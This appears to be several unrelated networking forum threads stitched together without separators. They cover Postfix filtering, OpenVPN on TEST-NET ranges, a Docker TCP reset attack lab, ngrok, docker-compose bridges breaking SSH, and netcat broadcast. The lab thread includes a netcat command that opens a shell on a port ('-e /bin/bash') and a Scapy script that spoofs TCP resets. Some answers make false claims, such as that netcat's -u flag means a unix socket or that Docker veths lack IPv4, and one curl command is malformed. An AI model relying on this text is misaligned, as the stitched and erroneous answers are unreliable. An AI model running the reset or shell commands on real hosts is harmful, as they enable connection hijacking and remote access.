I am using a Postfix hook to check every mail with a bash script.
I have this line in my master.cf:
smtp inet n - y - - smtpd -o content_filter=myhook:dummy
My script is also called for outgoing emails, but I want it to run only for mail that I receive. How can I configure this?
Best regards
My guess is that your incoming and outgoing emails are sent to Postfix through the same process (smtpd listening on the smtp port, 25), so the content_filter is applied either way.
One way to achieve your goal is to use another smtpd process, listening on another port, without the content_filter. In master.cf:
smtp inet n - y - - smtpd -o content_filter=myhook:dummy
1025 inet n - y - - smtpd
With this configuration:
Every mail sent to port 25 is filtered.
Every mail sent to port 1025 is not filtered.
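For completeness, the myhook transport itself is declared in master.cf as a pipe service, along these lines (a sketch; the script path and the filter user are placeholders):
myhook unix - n n - - pipe
  flags=Rq user=filter argv=/usr/local/bin/myhook.sh -f ${sender} -- ${recipient}
Outgoing mail then has to be submitted through port 1025 (for example by pointing your application's relay settings at it) so that it bypasses the filter.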
Background
I have a strange use-case where my VPN cannot be on any of the private subnets, but, also cannot use a TAP interface. The machine will be moving through different subnets, and requires access to the entire private address space by design. A single blocked IP would be considered a failure of design.
So, these are all off limits:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.0.0/16
In searching for a solution, I came across RFC 5735, which defines:
192.0.2.0/24 TEST-NET-1
198.51.100.0/24 TEST-NET-2
203.0.113.0/24 TEST-NET-3
As:
For use in documentation and example code. It is often used in conjunction with domain names
example.com or example.net in vendor and protocol documentation. As described in [RFC5737], addresses within this block do not legitimately appear on the public Internet and can be used without any coordination with IANA or an Internet registry.
Which was a "jackpot" moment for me and my use case.
Config
I configured an OpenVPN server as such:
local 0.0.0.0
port 443
proto tcp
dev tun
topology subnet
server 203.0.113.0 255.255.255.0 # TEST-NET-3 RFC 5735
push "route 203.0.113.0 255.255.255.0"
...[Snip]...
With Client:
client
nobind
dev tun
proto tcp
...[Snip]...
And ufw rules:
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -s 203.0.113.0/24 -o ens160 -j MASQUERADE
COMMIT
However, upon running I get the following in the error logs, while the VPN completes the rest of its connection successfully:
/sbin/ip route add 203.0.113.0/24 via 203.0.113.1
RTNETLINK answers: File exists
No connection
Running the following commands:
Server: sudo python3 -m http.server 80
Client: curl -X GET / 203.0.113.1
Results in:
curl: (28) Failed to connect to 203.0.113.1 port 80: Connection timed out
I have tried:
/sbin/ip route replace 203.0.113.0/24 dev tun0 on client and server.
/sbin/ip route change 203.0.113.0/24 dev tun0 on client and server.
Adding route 203.0.113.0 255.255.255.0 to the server.
Adding push "route 203.0.113.0 255.255.255.0 127.0.0.1" to the server.
And none of it seems to work.
Does anyone have any idea how I can force the client to push this traffic over the VPN to my server, instead of to the public IP?
This does actually work!
Just don't forget to allow connections within your firewall. I fixed my config with:
sudo ufw allow in on tun0
However, 198.18.0.0/15 and 100.64.0.0/10, defined as benchmarking and shared address space respectively, may be more appropriate choices, since being able to forward TEST-NET addresses may be considered a bug.
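If you do switch ranges, the corresponding lines from the config above would become something like this (a sketch; size the subnet to your needs):
server 198.18.0.0 255.255.255.0
push "route 198.18.0.0 255.255.255.0"
with the matching NAT rule:
-A POSTROUTING -s 198.18.0.0/24 -o ens160 -j MASQUERADE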
Currently, I am trying to carry out a TCP reset attack on 3 Docker containers: Attacker, Host01, and Host02. My goal is to attack the TCP connection between Host01 and Host02, and the end result should be that the TCP connection breaks when the reset attack is executed.
Here is my code:
My testing procedure is: first, I run the code below in the Attacker container. Then, on Host02, I execute "nc -lvp 1337 -e /bin/bash", and on Host01, I execute "nc 192.168.124.20 1337". The source IP is 192.168.124.10 and the destination is 192.168.124.20. The source port is 40967 and the destination port is 1337.
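In outline, such a reset script follows the usual Scapy pattern (this is a minimal illustrative sketch using the addresses above, not the exact code):
#!/usr/bin/env python3
# Minimal TCP reset sketch with Scapy (illustrative only).
# Sniff one packet of the victim connection, then spoof a RST from
# Host02 back to Host01 using the sequence number Host01 expects.
from scapy.all import IP, TCP, send, sniff

def send_rst(pkt):
    rst = IP(src=pkt[IP].dst, dst=pkt[IP].src) / TCP(
        sport=pkt[TCP].dport,
        dport=pkt[TCP].sport,
        flags="R",
        # A RST is only accepted if its sequence number matches what
        # the receiver expects next, i.e. the ACK it just sent.
        seq=pkt[TCP].ack,
    )
    send(rst, verbose=False)

# Watch Host01 -> Host02 traffic on the victim connection.
sniff(filter="tcp and src host 192.168.124.10 and dst port 1337",
      prn=send_rst, count=1)
A common reason the connection survives is that the forged RST's sequence number does not match exactly, in which case the receiver silently drops it.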
I don't know why, when the script ran, the TCP connection between Host01 and Host02 did not break: I could still enter commands from Host01.
I used Wireshark to check whether the RST packet was sent, and it actually was (the red line):
Please help me on this, Huy Nguyen.
I was wondering if there's a way to assign a specific port using TCP to the URL that ngrok generates.
I tried with the config.yml file; it has this configuration, but it doesn't work:
tunnels:
blueiris:
remote_port: 5666
proto: tcp
addr: 123
it generates this URL: Forwarding tcp://0.tcp.ngrok.io:18777 -> localhost:123
The localhost port pretty much doesn't matter. I want to assign port 5666 to the URL 0.tcp.ngrok.io so it becomes: 0.tcp.ngrok.io:5666
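From what I can tell from the ngrok docs, TCP tunnels take a remote_addr (a reserved TCP address, which is a paid feature) rather than remote_port, so the config might need to look like the sketch below, though the reserved host and port are assigned by ngrok:
tunnels:
  blueiris:
    proto: tcp
    addr: 123
    remote_addr: 1.tcp.ngrok.io:5666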
Thanks.
I need help understanding my networking logs, which relate to docker-compose networking.
I'm ssh'd into a VM, and I have two projects with docker-compose. The first is launched simply with docker-compose up. When I try to launch the second, my ssh session freezes, and I can no longer ssh into the VM. After lots of trial and error, and after reading this, I tried to append the following to my 2nd project's docker-compose.yml file:
networks:
default:
external:
name: abcdef_default
where abcdef_default is the name of the network created by docker-compose up of the 1st project. With this, the docker-compose up on the 2nd project doesn't kick me out of the ssh session.
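For reference, the network name and its subnet can be checked with:
docker network ls
docker network inspect --format '{{range .IPAM.Config}}{{.Subnet}}{{end}}' abcdef_default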
I tailed the logs in /var/log/*.log; here's the output with the networks section in the docker-compose.yml file (timestamp prefixes like Jan 19 09:13:42 hostname kernel: [420096.305357] stripped):
aufs au_opts_verify:1597:dockerd[13813]: dirperm1 breaks the protection by the permission bits on the lower branch
device veth6a84537 entered promiscuous mode
IPv6: ADDRCONF(NETDEV_UP): veth6a84537: link is not ready
eth0: renamed from veth2480623
IPv6: ADDRCONF(NETDEV_CHANGE): veth6a84537: link becomes ready
br-fe0deb0149df: port 18(veth6a84537) entered forwarding state
br-fe0deb0149df: port 18(veth6a84537) entered forwarding state
aufs au_opts_verify:1597:dockerd[25317]: dirperm1 breaks the protection by the permission bits on the lower branch
device veth1a3c1e3 entered promiscuous mode
IPv6: ADDRCONF(NETDEV_UP): veth1a3c1e3: link is not ready
br-fe0deb0149df: port 22(veth1a3c1e3) entered forwarding state
br-fe0deb0149df: port 22(veth1a3c1e3) entered forwarding state
eth0: renamed from veth54e576d
IPv6: ADDRCONF(NETDEV_CHANGE): veth1a3c1e3: link becomes ready
br-fe0deb0149df: port 22(veth1a3c1e3) entered disabled state
veth54e576d: renamed from eth0
br-fe0deb0149df: port 22(veth1a3c1e3) entered disabled state
device veth1a3c1e3 left promiscuous mode
br-fe0deb0149df: port 22(veth1a3c1e3) entered disabled state
br-fe0deb0149df: port 18(veth6a84537) entered forwarding state
and here's the output without the networks section (i.e. when I get kicked out of the ssh session):
IPv6: ADDRCONF(NETDEV_UP): br-55349b03453a: link is not ready
aufs au_opts_verify:1597:dockerd[26982]: dirperm1 breaks the protection by the permission bits on the lower branch
aufs au_opts_verify:1597:dockerd[26982]: dirperm1 breaks the protection by the permission bits on the lower branch
aufs au_opts_verify:1597:dockerd[3051]: dirperm1 breaks the protection by the permission bits on the lower branch
device veth7a1bcde entered promiscuous mode
IPv6: ADDRCONF(NETDEV_UP): veth7a1bcde: link is not ready
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
br-55349b03453a: port 1(veth7a1bcde) entered disabled state
eth0: renamed from veth5d8a2ea
IPv6: ADDRCONF(NETDEV_CHANGE): veth7a1bcde: link becomes ready
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
IPv6: ADDRCONF(NETDEV_CHANGE): br-55349b03453a: link becomes ready
aufs au_opts_verify:1597:dockerd[13814]: dirperm1 breaks the protection by the permission bits on the lower branch
aufs au_opts_verify:1597:dockerd[13814]: dirperm1 breaks the protection by the permission bits on the lower branch
aufs au_opts_verify:1597:dockerd[13922]: dirperm1 breaks the protection by the permission bits on the lower branch
device veth3253bd4 entered promiscuous mode
IPv6: ADDRCONF(NETDEV_UP): veth3253bd4: link is not ready
br-55349b03453a: port 2(veth3253bd4) entered forwarding state
br-55349b03453a: port 2(veth3253bd4) entered forwarding state
br-55349b03453a: port 2(veth3253bd4) entered disabled state
eth0: renamed from veth9c8aaa3
IPv6: ADDRCONF(NETDEV_CHANGE): veth3253bd4: link becomes ready
br-55349b03453a: port 2(veth3253bd4) entered forwarding state
br-55349b03453a: port 2(veth3253bd4) entered forwarding state
br-55349b03453a: port 2(veth3253bd4) entered disabled state
veth9c8aaa3: renamed from eth0
br-55349b03453a: port 2(veth3253bd4) entered disabled state
device veth3253bd4 left promiscuous mode
br-55349b03453a: port 2(veth3253bd4) entered disabled state
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
br-55349b03453a: port 1(veth7a1bcde) entered disabled state
veth5d8a2ea: renamed from eth0
br-55349b03453a: port 1(veth7a1bcde) entered disabled state
device veth7a1bcde left promiscuous mode
br-55349b03453a: port 1(veth7a1bcde) entered disabled state
I don't really understand how to read these logs.
Here is my ifconfig output as well.
Can someone help me read the logs and figure out what the problem is?
Diagnosis
Our team is using AWS EC2 instances running Ubuntu 18.04 as devservers. We recently got reports that docker-compose broke SSH connections. Even after restarting, the devservers were still inaccessible, so I started investigating.
I was able to rule out docker-compose as the cause by reproducing the issue using docker only.
ubuntu@ip-172-31-115-116:~$ docker network create -d bridge my-bridge-network
aca5884d60f146cef81ac55c8cccd231a43f40927d645168642d9b28c5e009a6
ubuntu@ip-172-31-115-116:~$ docker network prune
WARNING! This will remove all custom networks not used by at least one container.
Are you sure you want to continue? [y/N] y
Deleted Networks:
my-bridge-network
ubuntu@ip-172-31-115-116:~$ docker network create -d bridge my-bridge-network
f0a7a06a9627bc2de00eb60091a92010451690626d95e077f622f3058cc3a07c
ubuntu@ip-172-31-115-116:~$ docker network prune
WARNING! This will remove all custom networks not used by at least one container.
Are you sure you want to continue? [y/N] y
Deleted Networks:
my-bridge-network
ubuntu@ip-172-31-115-116:~$ docker network create -d bridge my-bridge-network
Connection reset by 172.31.115.116 port 22
Then the root cause occurred to me.
Root cause
Our docker-compose files use the bridge network mode, which creates a new bridge network by default. When docker-compose down or docker network prune is run, the bridge network is torn down, and the next docker-compose run or docker network create creates a new bridge network.
The default IP range for the docker0 bridge adapter is 172.17.0.0/16.
When I first ran the docker network create -d bridge my-bridge-network command, it created a new bridge adapter for 172.18.0.0/16.
The second bridge adapter was created for 172.19.0.0/16.
Naturally, the 3rd bridge adapter is created for 172.20.0.0/16. However, that is our Engineering VPN IP range, and the overlap left the server unable to communicate with our laptops.
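Each allocation is visible in the host's routing table, one entry per br-* adapter, e.g.:
ip route | grep br-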
Solutions
The solution is to make sure new docker bridge networks will skip our VPN IP range.
Temp solution
If we add the IP ranges to be skipped to the system route table, docker will automatically avoid them. Therefore, we can run the command below whenever the devserver is rebooted.
sudo route add -net [our VPN IP range] netmask 255.255.0.0 gw [our gateway]
This solution is imperfect in that the new routes are discarded after the machine restarts.
Main solution
We should permanently apply the route changes to all devservers.
echo " routes:" | sudo tee -a /etc/netplan/50-cloud-init.yaml
echo " - to: [our VPN IP range]" | sudo tee -a /etc/netplan/50-cloud-init.yaml
echo " via: [our gateway]" | sudo tee -a /etc/netplan/50-cloud-init.yaml
sudo netplan apply
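For reference, the appended lines have to end up nested under the interface's entry, so the resulting file should look roughly like this (the interface name and dhcp4 line are illustrative; note that plain appending assumes the interface block is the last thing in the file):
network:
  version: 2
  ethernets:
    eth0:
      dhcp4: true
      routes:
        - to: [our VPN IP range]
          via: [our gateway]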
Docker IP changes
We also plan to modify the docker default-address-pools to redefine docker IP ranges. Refer to https://github.com/docker/compose/issues/4336#issuecomment-457326123. I would say modifying /etc/docker/daemon.json is better.
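For illustration, a minimal /etc/docker/daemon.json along these lines (the base range is a placeholder; pick one clear of your VPN), followed by a daemon restart:
{
  "default-address-pools": [
    { "base": "10.254.0.0/16", "size": 24 }
  ]
}
sudo systemctl restart docker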
br-xxxxxxx are the bridge interfaces of Docker and vethxxxxxxx are the virtual interfaces of your containers. Docker uses those veth interfaces, but you do not interact with them directly; they use an IPv6 address and don't have IPv4. Docker can't create NAT interfaces; it can only create bridges and veths with IPv6 for containers. You can link your bridge to any physical or virtual interface of your host.
So it works like this:
eth0 (your interface, or a v-interface if you want) ↔ br-xxxxx (docker bridge) ↔ vethxxxxx (v-interface of your container)
That's all I can say; I'm not sure anyone else will answer, as there are not a lot of Docker experts around, so I'm giving you all the information I can to help you understand your logs.
I finally ended up running docker network ls. The output was a list of more than 15 networks, all very old. I ran docker ps to make sure that nothing related to these networks was still running. One container was indeed still running (redis), and it was on a network called bridge. I stopped the container. Then I went through the networks with docker network rm <network name> until I was left with 4: bridge, host, none, and the only network that was still working. After that I could start new networks with docker-compose up again as usual.
I had the same issue. I solved it by setting the network_mode option in docker-compose (see the docs here; the solution came from this thread):
services:
my_service:
image: ...
network_mode: "host"
I'm trying to send a broadcast message using netcat.
I have firewalls open and sending a regular message like this works for me:
host: nc -l 192.168.1.121 12101
client: echo "hello" | nc 192.168.1.121 12101
But I can't get something like this to work.
host: nc -lu 0.0.0.0 12101
client: echo "hello" | nc -u 255.255.255.255 12101
Am I using the right flags? Note, the host is on Mac and the client on Linux. Can you give me an example that works for broadcasting a message?
Thanks!
The GNU version of netcat might be broken. (I can't get it to work under 0.7.1, anyway.) See http://sourceforge.net/p/netcat/bugs/8/
I've gotten socat to work. The code below does a UDP broadcast to port 24000.
socat - UDP-DATAGRAM:255.255.255.255:24000,broadcast
(In socat-world "-" means "stdin".)
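For the receiving end, something along these lines should work (assuming socat is available there as well):
socat - UDP-RECV:24000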
You're not telling netcat that you want to broadcast; that is done using the -b option to nc/netcat:
nc -h 2>&1 | grep -- -b
-b allow broadcasts
A simple example that works on Ubuntu. All the info is in the other answers, but I had to piece it together, so I thought I would share the result.
server
nc -luk 12101
client
echo -n "test data" | nc -u -b 255.255.255.255 12101
The client will hang until you press Ctrl-C.
Sorry if I am assuming wrong, but you mentioned that you have your firewalls set up correctly, so I am guessing that the host and client are not on the same subnet?
If that is the case, and the firewall is also acting as a router (or the packet has to go through a router), then it is going to process that packet but will not forward it out its other interfaces. If you wanted that to happen, you would need to send a directed broadcast. For example, for the subnet 192.168.1.0/24 the directed broadcast would be 192.168.1.255, the last IP in the subnet. Then the firewall, assuming it had a route to 192.168.1.0/24 and is set up to forward directed broadcasts, would forward that broadcast to the destination or next hop. To configure your device to forward directed broadcasts, you would need to reference its documentation; on Cisco IOS you would type "ip directed-broadcast" under the interface.
255.255.255.255 is a limited broadcast and is not going to get past your routers regardless; it is solely intended for the layer 2 link on which it resides.
As for how netcat is set up:
-l 0.0.0.0 12101 tells netcat to listen on port 12101 on all interfaces that are up and have an IP address assigned. The -u is not needed, as it tells netcat to listen on a unix domain socket; google IPC :) (this is the biggest reason your scenario is not working).
The below should work to get a broadcast forwarded to another network via netcat:
server: nc -l 0.0.0.0 12101
host: echo "hello" | nc 192.168.1.255 12101
Hope that helps, sorry if that was long winded or off from what you were looking for :)